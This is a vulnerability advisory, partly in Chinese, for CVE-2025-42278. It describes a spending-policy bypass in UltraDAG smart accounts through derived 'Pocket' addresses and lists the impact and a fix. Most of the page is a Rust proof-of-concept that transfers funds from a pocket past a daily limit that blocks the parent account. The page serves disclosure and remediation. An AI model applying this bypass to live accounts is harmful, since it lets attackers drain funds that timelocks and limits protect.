CVE-2025-42278: UltraDAG Smart Account Spending Policy Bypass via Pockets

# 漏洞总结：Smart Account Spending Policy Bypass via Pockets ## 漏洞概述 **标题**：Smart Account Spending Policy Bypass via Pockets **严重性**：Critical (高危) **CVE ID**：CVE-2025-42278 **描述**：UltraDAG StateEngine 实现中存在逻辑缺陷。当交易源自 "Pocket"（派生子地址）时，`check_spending_policy` 方法在检查消费策略前，未能解析 Pocket 的父地址。由于 Pocket 是“虚拟”地址且没有自己的 `SmartAccountConfig`，该方法默认返回“无策略”（即允许所有操作），导致攻击者可以绕过父账户设置的严格限制（如每日限额、时间锁）。 ## 影响范围 * **总策略失效**：使用 "Vault" 功能（时间锁定转账）的高价值账户面临资金被瞬间盗取的风险。 * **每日限额绕过**：设置了严格每日预算（如 10 Udag）的账户，其 Pocket 余额（如 10,000 Udag）可在单个区块内被完全耗尽。 * **访问劫持**：攻击者若拥有单个“低安全”密钥（仅授权有限每日消费），可通过 Pocket 转移绕过限制，获得“全管理员”权限。 ## 修复方案 1. **实施策略继承**：更新 `check_spending_policy` 方法，在查询策略前，通过 `pocket_to_parent` 查找表解析父地址。 2. **强制严格默认安全**：如果地址被识别为 Pocket 但没有父配置，应返回错误（或严格默认策略），而不是默认允许。 ## POC 代码 (Exploit Script) ```rust use ultradag_coin::state::engine::StateEngine; use ultradag_coin::address::{Address, SecretKey}; use ultradag_coin::tx::smart_accounts::{Authorization, KeyType, SmartTransferTx, SmartOpTx, SmartOpType}; use ultradag_coin::constants::COIN; fn main() { println!("--- UD-03: Spending Policy Bypass via Pockets PoC ---"); let mut engine = StateEngine::new(); let alice_sk = SecretKey::from_bytes([0xA1; 32]); let alice_addr = alice_sk.address(); let alice_pub = alice_sk.verifying_key().to_bytes(); let alice_key_id = Authorization::compute_key_id(KeyType::P256, &alice_pub); // 1. Setup Alice with funds engine.credit(&alice_addr, 20_000 * COIN).unwrap(); // 2. Alice auto-registers and INITIATES a 1 Udag daily limit policy let mut op_reg = SmartOpTx { from: alice_addr, operation: SmartOpType::SetPolicy { instant_limit: 1 * COIN, vault_threshold: 0, vault_delay_rounds: 0, whitelisted_recipients: Vec::new(), daily_limit: Some(1 * COIN), }, fee: 0, nonce: 0, signing_key_id: alice_key_id, p256_pubkey: Some(alice_pub.to_vec()), signature: Vec::new(), webauthn: None, }; op_reg.signature = alice_sk.sign(&op_reg.signable_bytes()[..]).to_vec(); engine.apply_smart_op_tx(&op_reg, 0).expect("Auto-reg failed"); // 3. Force policy activation (simulating passage of time/rounds) engine.process_pending_policy_changes(3000); // 4. Create a "savings" pocket and move 10,000 Udag into it let pocket_label = "savings"; let pocket_addr = ultradag_coin::tx::name_registry::derive_pocket_address(&alice_addr, pocket_label); let mut op_pocket = SmartOpTx { from: alice_addr, operation: SmartOpType::CreatePocket { label: pocket_label.to_string(), }, fee: 0, nonce: 1, signing_key_id: alice_key_id, p256_pubkey: None, signature: Vec::new(), webauthn: None, }; op_pocket.signature = alice_sk.sign(&op_pocket.signable_bytes()[..]).to_vec(); engine.apply_smart_op_tx(&op_pocket, 3000).expect("CreatePocket failed"); engine.credit(&pocket_addr, 10_000 * COIN).unwrap(); let bob_addr = Address::from([0xB0; 20]); // 5. ATTEMPT 1: Transfer 1,000 Udag from MAIN (BLOCKED by policy) let mut tx_main = SmartTransferTx { from: alice_addr, to: bob_addr, amount: 1000 * COIN, fee: 0, nonce: 2, signing_key_id: alice_key_id, signature: Vec::new(), memo: None, webauthn: None, }; tx_main.signature = alice_sk.sign(&tx_main.signable_bytes()[..]).to_vec(); let res_main = engine.apply_smart_transfer_tx(&tx_main); println!("Transfer from main account: {:?}", res_main); // 6. ATTEMPT 2: Transfer 1,000 Udag from POCKET (BYPASSES policy) let mut tx_pocket = SmartTransferTx { from: pocket_addr, to: bob_addr, amount: 1000 * COIN, fee: 0, nonce: 0, signing_key_id: alice_key_id, signature: Vec::new(), memo: None, webauthn: None, }; tx_pocket.signature = alice_sk.sign(&tx_pocket.signable_bytes()[..]).to_vec(); let res_pocket = engine.apply_smart_transfer_tx(&tx_pocket); println!("Transfer from pocket account: {:?}", res_pocket); if res_pocket.is_ok() { println!("SUCCESS: Spending Policy was BYPASSED via pocket transfer! PoC confirmed."); } } ```

Goal Reached Thanks to every supporter — we hit 100%!

CVE-2025-42278: UltraDAG Smart Account Spending Policy Bypass via Pockets

More from this source